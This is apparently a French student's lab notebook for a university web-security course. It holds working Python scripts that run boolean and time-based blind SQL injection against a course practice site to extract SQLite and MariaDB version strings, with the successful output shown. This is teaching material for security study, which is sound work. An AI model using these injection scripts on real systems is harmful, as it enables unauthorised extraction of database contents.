# ipl I317B Sécurité : labos
## Semaine 3 : Vulnérabilitées web (2)

### Exercice 1, l'oracle:
Revenons un peux en arrière sur le site de notre mauvais développeur. Nous savons que le site utilise sqlite comme système de gestion de base de donnée mais nous aimerions en identifier la version. Utilisez le site de l'exercice 1 pour récupérer cette information.

https://labo.poney.pink/v01/s02/ex1/

In [29]:
import requests
import string

url = "https://labo.poney.pink/v01/s02/ex1/"

# Characters to try in the version string
chars = string.digits + "."  # SQLite versions are usually like 3.50.4
version = ""
position = 1  # Start from the first character

while True:
    found = False
    for c in chars:
        # Construct payload to check if the character at current position matches
        payload = f'" OR substr(sqlite_version(),{position},1)="{c}";--'
        data = {"login": payload, "password": ""}
        r = requests.post(url, data=data)

        if "Connected !" in r.text:
            version += c
            print(f"Found character {position}: {c}")
            position += 1
            found = True
            break

    if not found:
        # No more characters found → end of version string
        break

print(f"SQLite version is: {version}")

Found character 1: 3
Found character 2: .
Found character 3: 4
Found character 4: 6
Found character 5: .
Found character 6: 1
SQLite version is: 3.46.1


In [32]:
import requests
from bs4 import BeautifulSoup
import re
url = "https://sqlite.org/chronology.html"
response = requests.get(url)
soup = BeautifulSoup(response.text, "html.parser")


versions = set()

# :one: - Récupère les textes des liens
for a in soup.find_all("a"):
    text = a.get_text(strip=True)
    if text and re.match(r"^\d+\.\d+(\.\d+)?$", text):
        versions.add(text)

# :two: - Récupère aussi tout le texte brut contenant une version
for text in soup.stripped_strings:
    match = re.match(r"^\d+\.\d+(\.\d+)?$", text)
    if match:
        versions.add(match.group(0))

# :three: - Trie proprement
def version_key(v):
    return [int(x) for x in v.split('.')]

versions = sorted(versions, key=version_key)

for v in versions[::-1]:
     # print(f"Tentative avec version {v}")
    
     page = requests.post(
        f"https://labo.poney.pink/v01/s02/ex1/",
        data={
            "login": f'" or sqlite_version()="{v}";--',
            "password": ""
        }
     )

     if "Connected !" in page.text:
         print("Exercice réussi avec la version", v)
         break
     else:
         # print("Ho non :'-(")
         continue
   

Exercice réussi avec la version 3.46.1


In [22]:
import requests

def oracle(condition):
    page = requests.post(
        "https://labo.poney.pink/v01/s02/ex1/",
        data={
            "login": '"or ' + condition + ';--',
            "password": ""
        }
    )
    
    return ("Connected !" in page.text)

In [23]:
print("3.46.1 :", oracle("sqlite_version()='3.46.1'"))

3.46.1 : True


### Exercice 2, l'aveugle:
Pour ce dernier exercice, vous allez travailler un peu à l'aveugle. En effet, la page suicitant notre intérêt cette fois-ci ne contient qu'un formulaire simple qui à priori, ne fait rien ... mais il est injectable (promis) !

À vous de trouvez comment et de récupérer la version du système de gestion de base de donnée : https://labo.poney.pink/v01/s02/ex2/

Tips:
  - Cette fois-ci, c'est plus du sqlite mais du mariadb : https://mariadb.com/kb/en/version/
  - Et vous travaillez à l'aveugle ;-)

In [ ]:
import requests

page = requests.post(
    "https://labo.poney.pink/v01/s02/ex2/",
    data={
        "id": "' UNION VERSION();--",
    }
)

if "Connected !" in page.text:
    print("Exercice réussi")
else:
    print("Ho non :'-(")

In [14]:
URL = "https://labo.poney.pink/v01/s02/ex2/"
HEADERS = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"}

# Tunables
SLEEP_DELAY = 3        # reduce if possible
TIMEOUT = 4            # must be > SLEEP_DELAY
MAX_POS = 50
CHARSET = "0123456789abcdefghijklmnopqrstuvwxyz.-_"
THREADS = 20            # number of parallel requests per position

In [12]:
import requests
import time

def elapsed_for_payload(session: requests.Session, payload: str) -> float:
    start = time.time()
    try:
        session.post(URL, data={"id": payload}, headers=HEADERS, timeout=TIMEOUT)
        return time.time() - start
    except requests.exceptions.RequestException:
        return TIMEOUT + 1.0

In [ ]:
def auto_test(session: requests.Session, pos: int, ch: str, quote: str) -> tuple[str, float]:
    payload = f"1 OR IF(SUBSTRING(VERSION(),{pos},1)={quote}{ch}{quote}, SLEEP({SLEEP_DELAY}), 0)-- "
    t = elapsed_for_payload(session, payload)
    return ch, t

In [10]:
def detect_quote(session: requests.Session) -> str:
    print("[*] Detecting working quote...")
    for q in ("'", '"'):
        payload = f"1 OR IF(1=1, SLEEP({SLEEP_DELAY}), 0)-- "
        t = elapsed_for_payload(session, payload)
        if t > SLEEP_DELAY:
            print(f"[!] Detected working quote: {q}")
            return q
    print("[!] Defaulting to single quote (')")
    return "'"

In [11]:
from concurrent.futures import ThreadPoolExecutor, as_completed

def run_auto_timing(max_pos: int = MAX_POS):
    with requests.Session() as session:
        quote = detect_quote(session)
        extracted = ""

        print(f"[*] Starting extraction using {THREADS} threads per position...\n")
        for pos in range(1, max_pos + 1):
            futures = {}
            with ThreadPoolExecutor(max_workers=THREADS) as executor:
                for ch in CHARSET:
                    futures[executor.submit(auto_test, session, pos, ch, quote)] = ch

                found_char = None
                for future in as_completed(futures):
                    ch, elapsed = future.result()
                    if elapsed > SLEEP_DELAY:
                        found_char = ch
                        print(f"[FOUND] pos={pos}: '{ch}' ({elapsed:.2f}s)")
                        extracted += ch
                        break

            if not found_char:
                print(f"[!] No match at position {pos}")
                break

            print(f"[CURRENT] {extracted}")

        print("\n[RESULT] Extracted:", extracted)

In [15]:
if __name__ == "__main__":
    run_auto_timing(MAX_POS)

[*] Detecting working quote...
[!] Detected working quote: '
[*] Starting extraction using 20 threads per position...

[FOUND] pos=1: '1' (5.00s)
[CURRENT] 1
[FOUND] pos=2: '1' (5.00s)
[CURRENT] 11
[FOUND] pos=3: '.' (5.00s)
[CURRENT] 11.
[FOUND] pos=4: '5' (5.00s)
[CURRENT] 11.5
[FOUND] pos=5: '.' (5.00s)
[CURRENT] 11.5.
[FOUND] pos=6: '1' (5.00s)
[CURRENT] 11.5.1
[FOUND] pos=7: '-' (5.00s)
[CURRENT] 11.5.1-
[FOUND] pos=8: 'm' (5.00s)
[CURRENT] 11.5.1-m
[FOUND] pos=9: 'a' (5.00s)
[CURRENT] 11.5.1-ma
[FOUND] pos=10: 'r' (5.00s)
[CURRENT] 11.5.1-mar
[FOUND] pos=11: 'i' (5.00s)
[CURRENT] 11.5.1-mari
[FOUND] pos=12: 'a' (5.00s)
[CURRENT] 11.5.1-maria
[FOUND] pos=13: 'd' (5.00s)
[CURRENT] 11.5.1-mariad
[FOUND] pos=14: 'b' (5.00s)
[CURRENT] 11.5.1-mariadb
[!] No match at position 15

[RESULT] Extracted: 11.5.1-mariadb


### Exercice 3, bonus:
Toujours pour l'exercice 2, pouvez-vous extraire le nom de la base de donnée et l'utilisateur utilisé pour s'y connecter ?

In [18]:
# TODO